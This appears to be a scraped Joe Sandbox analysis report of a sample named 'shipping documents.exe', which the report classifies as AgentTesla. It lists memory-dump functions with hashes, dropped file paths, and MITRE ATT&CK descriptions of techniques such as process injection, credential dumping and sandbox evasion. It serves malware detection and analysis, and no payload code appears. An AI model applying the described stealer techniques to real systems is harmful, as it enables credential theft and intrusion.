Function 021B1AE0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1608257783.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21b0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a69c143b0febc4c38e7b0bc790476105136fad14c6e24961208b38915620a4c
Instruction ID: fa8b74f589e0670264f4cea0cb6406eec122e1fed1e905e1025a0ee99b8dc76c
Opcode Fuzzy Hash: 0a69c143b0febc4c38e7b0bc790476105136fad14c6e24961208b38915620a4c
Instruction Fuzzy Hash: E2D05B357402149FC710EB79ED49A85377CEF09711F514095E608CB250EB71DC14C7D1

Function 021B08A8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1608257783.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21b0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4ea62de900c7ab04c46572a356f9e4a461eeb0ef41381b1d8c6a18262f943db
Instruction ID: 7ae8b08be87da3c9f28ff4e9ccd4137d79242dec639f8058a629eb7813014439
Opcode Fuzzy Hash: d4ea62de900c7ab04c46572a356f9e4a461eeb0ef41381b1d8c6a18262f943db
Instruction Fuzzy Hash: 65D067B1D01219AF8F41EFB999091DEBBF8FE09251B114576D919E3200E7705B10CBD1

Analysis Process: boqXv.exePID: 8012, Parent PID: 4084COMMON

Executed Functions

Function 00BA1340 Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18cb8eb4058bbf95d35ca9ae4b42264843dc9373d76e2a725ccf2c2a173557b3
Instruction ID: 9aa3dbd6681554fa9bfa03cd5810200664967fbaa8d0c1d9f6af6f5f72c7efbd
Opcode Fuzzy Hash: 18cb8eb4058bbf95d35ca9ae4b42264843dc9373d76e2a725ccf2c2a173557b3
Instruction Fuzzy Hash: 8F222C34704202CFDB94EF78D89062A73B6FBC9306F6089A9D55687399EB39EC45CB40

Function 00BA0CE3 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1a6fa74f0eab68500837d50b011860aeb738c7bf62162e6e3f8ff8eaa984411
Instruction ID: d236f65fc6e13da0381cdeda2b8f500c89d8d1263906dc444321314b103609d7
Opcode Fuzzy Hash: c1a6fa74f0eab68500837d50b011860aeb738c7bf62162e6e3f8ff8eaa984411
Instruction Fuzzy Hash: 3F716035A00305CFDB19ABB4C45879EBBF2EF89301F14C9AAD80667264DF75AC95DB40

Function 00BA123B Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ddaf658bd51339fc5bf180db8cf6349501e58cd3f9ee3356857b70d9d3a65ae
Instruction ID: d5638ea5d26a974eddc7aee9644fcc32e131c685716e95b940a0ec6e543cc43c
Opcode Fuzzy Hash: 8ddaf658bd51339fc5bf180db8cf6349501e58cd3f9ee3356857b70d9d3a65ae
Instruction Fuzzy Hash: 2421C535701610CFCB98AB79C458A2D77E6AF8AA1636109A8E506CF771DA36DC42CB80

Function 00BA1240 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c848a50e3b9b2e0e7880e9fbfe110e9b92c82a252d454170b7d602bae2a1843
Instruction ID: f5a9df678a8068c707fd1b02520b0c0d3ad012684e26a58b9adac0f56e19a516
Opcode Fuzzy Hash: 5c848a50e3b9b2e0e7880e9fbfe110e9b92c82a252d454170b7d602bae2a1843
Instruction Fuzzy Hash: 2E21D435701210CFCB98AB79C45892D77E6AF8AA1636109B8E506CF771DB36DC42CB80

Function 00BA1AE0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1bdfd4b305722fc860b7f584c745fdbe0b717ca24934e61186b4fb4bee37fa0
Instruction ID: a9d9e78047ce2b1a8106885c05a8fd9108d13e26ae71bfce8a942398648aee23
Opcode Fuzzy Hash: b1bdfd4b305722fc860b7f584c745fdbe0b717ca24934e61186b4fb4bee37fa0
Instruction Fuzzy Hash: 1E11B235B002049FD748EF74A45079D77A6EBC9301F5084A9D60997395EF349D06CBA1

Function 00BA1C09 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bbbd8db13941c2d77e4638dbb85d294a216e355cb4de7055cd3f205fe7fd6c5
Instruction ID: 51b17ec90aad24f20d2ba7aa3b3b2eeb6e50ed89c0f2f461d2316e84a8d21225
Opcode Fuzzy Hash: 8bbbd8db13941c2d77e4638dbb85d294a216e355cb4de7055cd3f205fe7fd6c5
Instruction Fuzzy Hash: 0401C03AE002059FCB40EFB8D84499BFBF5FF8C300710866AE51497221E770A915CB90

Function 00BA1C10 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65c75382e54d2863c7c0f07f02d1e742b4d2ae00894c3cf21dcc9fd76d7fe459
Instruction ID: 16b6aa4f3e823d94a1216cb497944e651dd8d02a6be4ef7045aae7726778c499
Opcode Fuzzy Hash: 65c75382e54d2863c7c0f07f02d1e742b4d2ae00894c3cf21dcc9fd76d7fe459
Instruction Fuzzy Hash: 02019E3AE002059FCB44EFB9D8448AFFBF5FF8D300710866AE51997225E730A915CB90

Function 00BA0F9D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 996971ce7d7245172048b6f0e7d232a97dd403d25cb43bb43cadb917bef9db0f
Instruction ID: 7b6089be49354b1e1fe68968cc76564467b34dfec64ec91fc9e933c6329f18a5
Opcode Fuzzy Hash: 996971ce7d7245172048b6f0e7d232a97dd403d25cb43bb43cadb917bef9db0f
Instruction Fuzzy Hash: 58F01575A08345CFDB24EB78C45C7AD7BF0BB49B05F240898D402AB3A0CBB58C84CB60

Function 00BA1AD8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 868293bfa20a23789d1f62fcd0dc16e60864748e698b7a2fb2abde25ff9c7831
Instruction ID: 83ea5995c9c81cfbb760109d8a2cab95386af11a7aa617437bbbe73c1cbcf6ff
Opcode Fuzzy Hash: 868293bfa20a23789d1f62fcd0dc16e60864748e698b7a2fb2abde25ff9c7831
Instruction Fuzzy Hash: 1DE08C39700210DFD310EA78A949A9A37A8AB18702B504096E508CB2A4EB21E821CBA1

Function 00BA1B68 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24b8eb0d5a7da541eb80d5abc45a5ee7a451123666523af66006faf3a927b26d
Instruction ID: 3a17284e65756163bc37142276e77a43dfd9ab364ba709dee9b081171f40994d
Opcode Fuzzy Hash: 24b8eb0d5a7da541eb80d5abc45a5ee7a451123666523af66006faf3a927b26d
Instruction Fuzzy Hash: 5BE0C239200314DBE649B7B9A05076972D9ABC8612F404969D90987288EF286D1503E5

Function 00BA08A3 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf412619b87e4c5f25ee5c5dd37449ab75d414a73edc6d965d99b9cf1b6c77ce
Instruction ID: 5c776ad7da8e652c9a90d240bac144b2f709b966ac8c02f2c20a66bda1a04734
Opcode Fuzzy Hash: cf412619b87e4c5f25ee5c5dd37449ab75d414a73edc6d965d99b9cf1b6c77ce
Instruction Fuzzy Hash: 0BE0E2B1D11229AF8B40EBB899462DEBBF8FA09350B1045A6DA09E3200E6705A108BE1

Function 00BA08A8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1687850198.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ba0000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5a5b242687416e2ffb4e446c319b709c281de8da194f0ba99608635409d666a
Instruction ID: 09c778cbb3dbbc2af17e179b113e384c7c4830bbc53c36c5554225938cfe866d
Opcode Fuzzy Hash: a5a5b242687416e2ffb4e446c319b709c281de8da194f0ba99608635409d666a
Instruction Fuzzy Hash: B1D067B1D05219AF8B40EFB999051DEBBF8FE09251F1045A6D919E3200E7745A109BE1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report shipping documents.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\boqXv.exe.log

C:\Users\user\AppData\Local\Temp\Hezron

C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
shipping documents.exe

Function 067E26C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 067E26BB Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 067EAD50 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Function 067ECF24 Relevance: 1.6, APIs: 1, Instructions: 121
COMMON

Function 067ECF30 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 067EA41C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 067E2900 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 067E2908 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 01937349 Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 01937350 Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre